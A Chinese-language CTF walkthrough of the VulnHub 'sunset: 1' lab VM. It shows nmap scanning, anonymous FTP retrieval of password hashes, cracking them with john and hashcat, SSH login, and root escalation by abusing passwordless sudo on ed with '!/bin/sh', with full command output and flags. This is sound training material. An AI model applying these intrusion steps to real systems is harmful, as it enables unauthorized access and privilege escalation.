vulnhub靶机渗透[sunset-1]

Posted on Edited on In Views: Word count in article: 1.8k Reading time ≈ 7 mins.

名称

名称:sunset: 1
发布日期:2019年7月29日

下载

sunset.zip

  • Download: https://mega.nz/#!AGZU1C6J!y_Pc0BEJ2EsAFiBeUY91s4e9mgrlo8sN4aT3wKVen6s
  • Download (Mirror): https://download.vulnhub.com/sunset/sunset.zip
  • Download (Torrent): https://download.vulnhub.com/sunset/sunset.zip.torrent

描述

N/A

信息收集

上nmap

1
2
3
4
root@kali:~# nmap -sn -v 192.168.56.*
Nmap scan report for 192.168.56.123
Host is up (0.00016s latency).
MAC Address: 08:00:27:89:F0:14 (Oracle VirtualBox virtual NIC)
1
2
3
4
root@kali:~# nmap -v -p- -sV 192.168.56.123
PORT   STATE SERVICE VERSION
21/tcp open  ftp     pyftpdlib 1.5.5
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10 (protocol 2.0)
1
2
3
4
5
6
7
root@kali:~# nmap -p 21,22 -v -A -T4 --script=vuln 192.168.56.123
PORT   STATE SERVICE VERSION
21/tcp open  ftp     pyftpdlib 1.5.5
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

通过尝试发现可以通过anonymous用户登录ftp

列举

不出所料,尝试使用匿名用户登录ftp,并成功完成了此操作,此后在那里获得了一个名为“ backup”的文件。首先将该文件保存在系统中,然后打开该文件并得到五个用户的哈希值。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
root@kali:~/vulnhub/sunset# ftp 192.168.56.123
Connected to 192.168.56.123.
220 pyftpdlib 1.5.5 ready.
Name (192.168.56.123:root): anonymous
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw-r--r--   1 root     root         1062 Jul 29  2019 backup
226 Transfer complete.
ftp> get backup
local: backup remote: backup
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
1062 bytes received in 0.01 secs (135.0579 kB/s)
ftp> quit
221 Goodbye.
root@kali:~/vulnhub/sunset# ls
backup
root@kali:~/vulnhub/sunset# cat backup 
CREDENTIALS:                                                                                                                                                                                                       
office:$6$$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCr/avWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.                                                                                                                  
datacenter:$6$$3QW/J4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ/6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/                                                                                                              
sky:$6$$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0                                                                                                                     
sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/

复制这些hash并将其保存在名为hash的文件中,然后将在crack工具john的帮助下破解用户“sunset”找到密码“ cheer14”的hash。下一步使用此用户名和密码通过ssh连接。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@kali:~/vulnhub/sunset# john hash
Warning: detected hash type "HMAC-SHA256", but the string is also recognized as "HMAC-SHA512"
Use the "--format=HMAC-SHA512" option to force loading these as that type instead
Warning: only loading hashes of type "HMAC-SHA256", but also saw type "sha512crypt"
Use the "--format=sha512crypt" option to force loading hashes of that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (HMAC-SHA256 [password is key, SHA256 256/256 AVX2 8x])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 10 candidates buffered for the current salt, minimum 32 needed for performance.
Warning: Only 11 candidates buffered for the current salt, minimum 32 needed for performance.
Warning: Only 29 candidates buffered for the current salt, minimum 32 needed for performance.
Warning: Only 20 candidates buffered for the current salt, minimum 32 needed for performance.
Warning: Only 26 candidates buffered for the current salt, minimum 32 needed for performance.
Warning: Only 29 candidates buffered for the current salt, minimum 32 needed for performance.
Warning: Only 8 candidates buffered for the current salt, minimum 32 needed for performance.
Warning: Only 16 candidates buffered for the current salt, minimum 32 needed for performance.
Warning: Only 31 candidates buffered for the current salt, minimum 32 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 15 candidates buffered for the current salt, minimum 32 needed for performance.
Further messages of this type will be suppressed.
To see less of these warnings, enable 'RelaxKPCWarningCheck' in john.conf
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII

john太慢,半天出不了结果,如果电脑显卡配置好的话,可以如下选用rockyou.txt字典并使用hashcat来破解密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
D:\hashcat-5.1.0\hashcat-5.1.0>hashcat64.exe -a 0 -m 1800 password.txt rockyou.txt
hashcat (v5.1.0) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device #2: Intel's OpenCL runtime (GPU only) is currently broken.
             We are waiting for updated OpenCL drivers from Intel.
             You can use --force to override, but do not report related errors.
nvmlInit(): Unknown Error

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1070, 2048/8192 MB allocatable, 16MCU

OpenCL Platform #2: Intel(R) Corporation
========================================
* Device #2: Intel(R) UHD Graphics 630, skipped.
* Device #3: Intel(R) Core(TM) i7-8750H CPU @ 2.20GHz, skipped.

Hashes: 5 digests; 5 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Uses-64-Bit

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Temperature abort trigger set to 90c

Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344367
* Bytes.....: 139921318
* Keyspace..: 14344360
* Runtime...: 3 secs

$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/:space
$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/:cheer14
Cracking performance lower than expected?

* Append -O to the commandline.
  This lowers the maximum supported password- and salt-length (typically down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Update your OpenCL runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

$6$$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0:sky
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Session..........: hashcat
Status...........: Running
Hash.Type........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: password.txt
Time.Started.....: Wed Apr 15 10:29:47 2020 (59 secs)
Time.Estimated...: Wed Apr 15 10:42:31 2020 (11 mins, 45 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    18801 H/s (10.91ms) @ Accel:64 Loops:32 Thr:32 Vec:1
Recovered........: 3/5 (60.00%) Digests, 1/2 (50.00%) Salts
Progress.........: 2162688/28688720 (7.54%)
Rejected.........: 0/2162688 (0.00%)
Restore.Point....: 1081344/14344360 (7.54%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:640-672
Candidates.#1....: 496580 -> 145263w
Hardware.Mon.#1..: N/A

Approaching final keyspace - workload adjusted.


Session..........: hashcat
Status...........: Exhausted
Hash.Type........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: password.txt
Time.Started.....: Wed Apr 15 10:29:47 2020 (14 mins, 9 secs)
Time.Estimated...: Wed Apr 15 10:43:56 2020 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    16929 H/s (10.62ms) @ Accel:64 Loops:32 Thr:32 Vec:1
Recovered........: 3/5 (60.00%) Digests, 1/2 (50.00%) Salts
Progress.........: 28688720/28688720 (100.00%)
Rejected.........: 0/28688720 (0.00%)
Restore.Point....: 14344360/14344360 (100.00%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:4992-5000
Candidates.#1....: $HEX[284d4f544f29333136] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: N/A

Started: Wed Apr 15 10:29:17 2020
Stopped: Wed Apr 15 10:43:58 2020

使用下面的命令查看已经破解的密码

1
2
3
4
D:\hashcat-5.1.0\hashcat-5.1.0>hashcat64.exe -a 0 -m 1800 password.txt rockyou.txt --show
$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/:space
$6$$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0:sky
$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/:cheer14

得到三个已经破解的用户和密码

1
2
3
space    space
sky      sky
sunset   cheer14

利用然后进一步提权

使用用户Sunset通过ssh登录,并在其中找到了名为user.txt的文件,并在其中再次获得了hash文件。

现在,检查哪个文件具有sudo权限,并且发现ed是sudoers的成员。

因此,执行!/bin/sh命令,并获得root访问权限。

以root用户身份登录后,再次找到了一个名为flag.txt的文件;

获得最后的flag。已经成功获得了root访问权限并通关了这个CTF box。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
root@kali:~# ssh sunset@192.168.56.123
The authenticity of host '192.168.56.123 (192.168.56.123)' can't be established.
ECDSA key fingerprint is SHA256:n9ATwmONo6fCyPblqlvcO7WcIWZJMqBaqDdo/jYnLPI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.123' (ECDSA) to the list of known hosts.
Enter passphrase for key '/root/.ssh/id_rsa': 
sunset@192.168.56.123's password: 
Linux sunset 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u1 (2019-07-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jul 28 20:52:38 2019 from 192.168.1.182
sunset@sunset:~$ id
uid=1000(sunset) gid=1000(sunset) groups=1000(sunset),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner)
sunset@sunset:~$ whoami
sunset
sunset@sunset:~$ ls
user.txt
sunset@sunset:~$ cat user.txt
5b5b8e9b01ef27a1cc0a2d5fa87d7190
sunset@sunset:~$ sudo -l
Matching Defaults entries for sunset on sunset:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sunset may run the following commands on sunset:
    (root) NOPASSWD: /usr/bin/ed
sunset@sunset:~$ sudo /usr/bin/ed
id
?
!/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# pwd
/home/sunset
# cd /root
# ls
flag.txt  ftp  server.sh
# cat flag.txt
25d7ce0ee3cbf71efbac61f85d0c14fe
#

知识点总结

  • ftp anonymous用户免密码登录
  • john破解linux sha512 hash值
  • hashcat破解linux sha512 hash值
  • sudo无需密码ed通过!/bin/sh提权

Game over

不好意思,这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本,i am so sorry about this…It’s a pity…

The end,to be continue…